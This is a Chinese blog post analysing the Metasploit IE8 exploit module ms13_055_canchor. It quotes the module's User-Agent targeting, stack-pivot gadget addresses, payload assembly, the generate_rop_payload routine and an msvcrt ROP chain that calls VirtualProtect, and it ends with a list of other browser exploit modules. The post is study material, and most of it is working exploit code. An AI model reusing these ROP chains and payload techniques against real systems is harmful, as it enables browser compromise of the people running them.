zoukankan      html  css  js  c++  java
  • ms13_055 metasploit

    111   def get_payload(t)
    112     if t['Rop'] == :msvcrt
    113       print_status("Using msvcrt ROP")
    114       esp_align = "x81xc4x54xf2xffxff"
    115       rop_dll = 'msvcrt'
    116       opts    = {'target'=>'xp'}
    117     else
    118       print_status("Using JRE ROP")
    119       esp_align = "x81xECxF0xD8xFFxFF" # sub esp, -10000
    120       rop_dll = 'java'
    121       opts    = {}
    122     end
    

      

    daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
    l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254

      

    daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
    00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0
    

      

    esp_align代表的汇编语句的作用是对齐esp,即栈指针。


     87   def get_target(agent)
     88     return target if target.name != 'Automatic'
     89 
     90     nt = agent.scan(/Windows NT (d.d)/).flatten[0] || ''
     91     ie = agent.scan(/MSIE (d)/).flatten[0] || ''
     92 
     93     ie_name = "IE #{ie}"
     94 
     95     case nt
     96     when '5.1'
     97       os_name = 'Windows XP SP3'
     98     when '6.1'
     99       os_name = 'Windows 7'
    100     end
    101 
    102     targets.each do |t|
    103       if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
    104         return t
    105       end
    106     end
    107 
    108     nil
    109   end
    

      

    188   def on_request_uri(cli, request)
    189     agent = request.headers['User-Agent']
    190     t = get_target(agent)
    

      

    当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来

    返回与版本相关的数据

     52       'Targets'        =>
     53         [
     54           [ 'Automatic', {} ],
     55           [
     56             'IE 8 on Windows XP SP3',
     57             {
     58               'Rop'   => :msvcrt,
     59               'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
     60               'Align' => 0x77c4d801  # add esp, 0x2c; ret
     61             }
     62           ],
     63           [
     64             'IE 8 on Windows 7',
     65             {
     66               'Rop'   => :jre,
     67               'Pivot' => 0x7c348b05, # xchg eax, esp; ret
     68               'Align' => 0x7C3445F8  # add esp, 0x2c; ret
     69             }
     70           ]
     71         ],
    

      

    如果当前的系统不支持,就会返回404页面。


    111   def get_payload(t)
    112     if t['Rop'] == :msvcrt
    113       print_status("Using msvcrt ROP")
    114       esp_align = "x81xc4x54xf2xffxff"
    115       rop_dll = 'msvcrt'
    116       opts    = {'target'=>'xp'}
    117     else
    118       print_status("Using JRE ROP")
    119       esp_align = "x81xECxF0xD8xFFxFF" # sub esp, -10000
    120       rop_dll = 'java'
    121       opts    = {}
    122     end
    123 
    124     p = esp_align + payload.encoded + rand_text_alpha(12000)
    125     generate_rop_payload(rop_dll, p, opts)
    126   end
    

      

    generate_rop_payload

     77   def generate_rop_payload(rop, payload, opts={})
     78     nop      = opts['nop']      || nil
     79     badchars = opts['badchars'] || ''
     80     pivot    = opts['pivot']    || ''
     81     target   = opts['target']   || ''
     82     base     = opts['base']     || nil
     83 
     84     rop = select_rop(rop, {'target'=>target, 'base'=>base})
     85     # Replace the reserved words with actual gadgets
     86     rop = rop.map {|e|
     87       if e == :nop
     88         sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
     89       elsif e == :junk
     90         Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
     91       elsif e == :size
     92         payload.length
     93       elsif e == :unsafe_negate_size
     94         get_unsafe_size(payload.length)
     95       elsif e == :safe_negate_size
     96         get_safe_size(payload.length)
     97       else
     98         e
     99       end
    100     }.pack("V*")
    101 
    102     raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
    103 
    104     return pivot + rop + payload
    105   end
    

      

    会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。

      3 <rop>
      4         <compatibility>
      5                 <target>WINDOWS XP SP2</target>
      6                 <target>WINDOWS XP SP3</target>
      7         </compatibility>
      8 
      9         <gadgets base="0x77c10000">
     10                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
     11                 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
     12                 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
     13                 <gadget value="junk">JUNK</gadget>
     14                 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
     15                 <gadget offset="0x0004d9bb">Writable location</gadget>
     16                 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
     17                 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
     18                 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
     19                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
     20                 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
     21                 <gadget value="junk">JUNK</gadget>
     22                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
     23                 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
     24                 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
     25                 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
     26                 <gadget offset="0x0004d9bb">Writable location</gadget>
     27                 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
     28                 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
     29                 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
     30                 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
     31                 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
     32                 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
     33                 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
     34                 <gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
     35         </gadgets>
     36 </rop>
    

      


    在查找Windows下Browser相关的ROP漏洞

    daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
    adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
    adobe_flash_otf_font.rb:100:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
    adobe_flash_otf_font.rb:110:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
    adobe_flash_otf_font.rb:120:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
    adobe_flash_otf_font.rb:130:      p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
    adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload('java', payload.encoded)
    adobe_flash_rtmp.rb:135:    code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
    adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
    adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
    aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
    apple_quicktime_mime_type.rb:153:      code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
    apple_quicktime_rdrf.rb:65:    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
    crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
    hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
    ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
    ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
    ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload('java', java_align + code)
    ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
    ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
    ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload('java', code)
    ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
    ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
    ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
    indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload('msvcrt', code,  {'pivot'=>stack_pivot, 'target'=>'xp'})
    indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
    mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
    mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
    ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
    ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload('java', p)
    ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload('java', p)
    ms11_081_option.rb:137:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
    ms11_081_option.rb:144:      rop_payload = generate_rop_payload('java', '')
    ms12_004_midi.rb:519:    generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
    ms12_037_same_id.rb:133:      rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
    ms12_037_same_id.rb:137:      rop = generate_rop_payload('java', '', {'pivot'=>pivot})
    ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
    ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
    ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    ms13_069_caret.rb:97:    p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
    ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
    ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
    ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
    ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
    ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
    ms14_012_textrange.rb:85:    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
    msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
    msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload('java','',{'pivot'=>adjust})
    novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
    novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
    ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
    ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload('java', code)
    quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
    siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
    vlc_amv.rb:143:      code = generate_rop_payload('java', payload.encoded)
    

      

  • 相关阅读:
    题解 UVA10213 【How Many Pieces of Land ?】
    NOIP 2018 游记
    POJ 1821 Fence(单调队列优化DP)
    HDU 2196 Computer(经典树形DP)
    POJ 2228 Naptime(DP+环形处理)
    POJ 1742 Coins(多重背包?)
    POJ 2311 Cutting Game(SG函数)
    BZOJ 2560(子集DP+容斥原理)
    HDU2841 Visible Trees(容斥原理)
    HDU 1796 How many integers can you find(容斥原理)
  • 原文地址:https://www.cnblogs.com/long123king/p/3818450.html
Copyright © 2011-2022 走看看